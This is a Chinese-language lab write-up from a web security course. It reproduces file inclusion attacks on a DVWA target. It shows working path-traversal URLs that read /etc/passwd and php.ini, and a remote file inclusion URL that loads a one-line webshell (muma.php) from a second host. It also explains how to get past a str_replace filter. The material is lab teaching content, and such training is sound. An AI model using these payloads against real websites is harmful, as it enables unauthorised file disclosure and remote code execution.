课程名称:
E055-web安全应用-File Inclusion文件包含漏洞初级
课程分类:
web安全应用
实验等级:
中级
任务场景:
【任务场景】
小王接到磐石公司的邀请,对该公司旗下网站进行安全检测,经过一番检查发现了该论坛的某个页面存在文件包含漏洞。反复测试后,小王总结了一下网站文件包含漏洞,为了让公司管理人员彻底的理解并修补漏洞,小王用DVWA情景再现。
任务分析:
【任务分析】
网站服务器通过php的特性(函数)去包含任意文件时,由于要包含的这个文件来源过滤不严,从而可以去包含一个恶意文件。
预备知识:
【预备知识】
PHP文件包含漏洞,就是在通过函数包含文件时,由于没有对包含的文件名进行有效的过滤处理,被攻击者利用从而导致包含了Web根目录以外的文件进来,就会导致文件信息的泄露甚至注入了恶意代码
当服务器的php配置中,选项allow_url_fopen与allow_url_include为开启状态时,服务器会允许包含远程服务器上的文件,如果对文件来源没有检查的话,就容易导致任意远程代码执行。
str_replace函数,能够对参数进行了一定的处理,将”http:// ”、”https://”、 ” ../”、”..\”替换为空字符,即删除。
---------------------------------------------------------------------------------------------------------------------------------
任务实施:
E055-web安全应用-File Inclusion文件包含漏洞初级
服务器场景:p9_win7-1(用户名:test;密码:123456)
服务器场景操作系统:Windows 7
服务器场景:p9_ws03-1(用户名:administrator;密码:123456)
服务器场景操作系统:Microsoft Windows2003 Server
---------------------------------------------------------------------------------------------------------------------------------
网络结构拓扑:
---------------------------------------------------------------------------------------------------------------------------------
实战复现:
打开火狐浏览器,在地址栏输入靶机的地址访问网页,使用默认用户名admin密码password登录:
点击“File Inclusion”后选择“file1.php”
构建本地包含url
“ http://172.16.1.4/vulnerabilities/fi/?page=/etc/passwd”
“ http://172.16.1.4/vulnerabilities/fi/?page=/etc/passwd”
报错,显示没有这个文件,说明服务器系统不是Linux,但同时暴露了服务器根目录文件的绝对路径C:\phpstudy\WWW\
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
构建绝对路径
http://172.16.1.4/vulnerabilities/fi/?page=C:\phpstudy\WWW\php.ini成功显示php.ini的内容
http://172.16.1.4/vulnerabilities/fi/?page=C:\phpstudy\WWW\php.ini
构建相对路径
加这么多..\是为了保证到达服务器的C盘根目录,可以看到读取是成功的
---------------------------------------------------------------------------------------------------------------------------------
远程文件包含
服务器的php配置中,选项allow_url_fopen与allow_url_include为开启状态时,服务器会允许包含远程服务器上的文件,如果对文件来源没有检查的话,就容易导致任意远程代码执行
第一步,在本地搭建一个可访问的网站并写好一句话木马
构造url
172.16.1.4/vulnerabilities/fi/?page=http://172.16.1.5/muma.php
172.16.1.4/vulnerabilities/fi/?page=http://172.16.1.5/muma.php
成功的访问了目标网站
本地文件包含
第一步:构建绝对路径url 构建绝对路径
http://172.16.1.4/vulnerabilities/fi/?page=C:\phpstudy\WWW\php.ini。成功显示php.ini内容
http://172.16.1.4/vulnerabilities/fi/?page=C:\phpstudy\WWW\php.ini
构建相对路径url
172.16.1.4/vulnerabilities/fi/?page=..\..\..\..\..\..\..\..\..\phpstudy\WWW\php.ini
172.16.1.4/vulnerabilities/fi/?page=..\..\..\..\..\..\..\..\..\phpstudy\WWW\php.ini
构造url
172.16.1.4/vulnerabilities/fi/?page=http://172.16.1.5/muma.php未能访问成功
172.16.1.4/vulnerabilities/fi/?page=http://172.16.1.5/muma.php
点击“view_source”查看源代码,可以看到,Medium级别的代码增加了str_replace函数,对page参数进行了一定的处理,将”http:// ”、”https://”、 ” ../”、”..\”替换为空字符,即删除
重新构建url链接,发现成功访问
实验结束,关闭虚拟机。